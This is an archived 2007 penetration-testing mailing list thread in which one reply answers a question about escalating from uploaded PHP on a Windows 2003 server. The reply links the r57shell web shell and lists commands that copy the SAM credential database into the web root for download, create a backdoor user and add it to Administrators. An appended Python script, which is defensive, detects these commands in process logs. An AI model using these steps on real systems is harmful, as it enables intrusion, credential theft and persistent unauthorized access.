Penetration Testing mailing list archives
Re: PHP Exploitation
From: "DokFLeed" <dokfleed () dokfleed net>
Date: Sun, 25 Nov 2007 11:12:24 +0400
I assume it's for the good cause, and you are authorized to do so?!

Upload this to the server:
http://www.dokfleed.net/duh/modules.php?name=News&file=article&sid=46
encoded for Zend Optimizer
Or
http://no.spam.ee/~tonu/phpshell/r57shell.txt

Try the following commands:
=====================
1) To see what's running on system
   tasklist -SVC
2) To get a copy of the sam database
   copy C:\windows\repair\sam C:\www\sam.txt
   http://hostname/sam.txt
3) To add new user with username tested123 & password tested123
   net user tested123 tested123 /add /active:yes /expires:never /passwordchg:yes /passwordreq:yes
4) To make him Administrator
   net localgroup Administrators tested123 /add
5) Try to RDP to the server, if it is Firewalled!!
   Download the RDP web front "Remote Desktop Connection Web Connection Software (455 KB)"
   Start IIS http://hostname/TSweb/ and log to Localhost

Remember, while testing, your imagination is your limitation :), depending on your phpinfo output none of this might work, so you will have to code around it.
Dok
Smoke Dope, Eat Soap, Fly Home in a Bubble
==================
----- Original Message -----
From: "Danux" <danuxx () gmail com>
To: <pen-test () securityfocus com>
Sent: Friday, November 23, 2007 6:29 AM
Subject: PHP Exploitation

Hi experts, I need your ideas. By now, I am able to upload php files to a Windows 2003 Server, so I can execute php code like phpinfo, but I can't execute passthru command because of lack of IUSR_MACHINE privileges. I have run some local php bof's without success.
Do you have another idea to break into the server through php code uploaded?
Cheers!!!!!
--
Danux, CISSP
Chief Information Security Officer
Macula Security Consulting Group
www.macula-group.com
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!
http://www.cenzic.com/downloads
------------------------------------------------------------------------
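For defenders: the commands quoted in the message above leave process-creation records on the host. The following is an added example, not part of the original post or thread, that matches those command lines and raises the severity when the parent is a web or PHP worker process. The record fields (parent, cmdline), the worker image names and the C:\php path are assumptions, and the sample records are constructed.

```python
import re

# Assumption: image names of the IIS worker and PHP interpreters that could
# be the parent of a command spawned from an uploaded PHP file.
WEB_PARENTS = {"w3wp.exe", "php-cgi.exe", "php.exe"}

# One rule per command quoted in the message, matched on the command line.
RULES = [
    ("service-enumeration", re.compile(r"\btasklist(\.exe)?\b.*[/-]svc\b", re.I)),
    ("sam-backup-copy", re.compile(r"\bcopy\b.*\\repair\\sam\b", re.I)),
    ("local-user-added", re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+.*\s/add\b", re.I)),
    ("admin-group-change", re.compile(
        r'\bnet1?(\.exe)?\s+localgroup\s+"?administrators"?\s.*/add\b', re.I)),
]

def image_name(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return (index, rule, severity) for every rule an event matches.

    Severity is "high" when the parent is a web/PHP process (the command came
    from web content) and "review" otherwise (may be normal administration).
    """
    hits = []
    for i, ev in enumerate(events):
        sev = "high" if image_name(ev["parent"]) in WEB_PARENTS else "review"
        for name, rx in RULES:
            if rx.search(ev["cmdline"]):
                hits.append((i, name, sev))
    return hits

# Constructed process-creation records (parent image, command line).
PHP = r"C:\php\php-cgi.exe"
CMD = r"C:\WINDOWS\system32\cmd.exe"
SAMPLE_EVENTS = [
    {"parent": r"C:\WINDOWS\system32\inetsrv\w3wp.exe", "cmdline": PHP},
    {"parent": PHP, "cmdline": r"cmd.exe /c tasklist -SVC"},
    {"parent": PHP, "cmdline": r"cmd.exe /c copy C:\windows\repair\sam C:\www\sam.txt"},
    {"parent": PHP, "cmdline": r"cmd.exe /c net user tested123 tested123 /add /active:yes"},
    {"parent": PHP, "cmdline": r"cmd.exe /c net localgroup Administrators tested123 /add"},
    {"parent": CMD, "cmdline": r"tasklist /svc"},  # interactive admin session
    {"parent": CMD, "cmdline": r"net user"},       # listing users only, no /add
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

The "review" hits are expected to include routine administration; the "high" hits are the ones where a web-facing process is the parent.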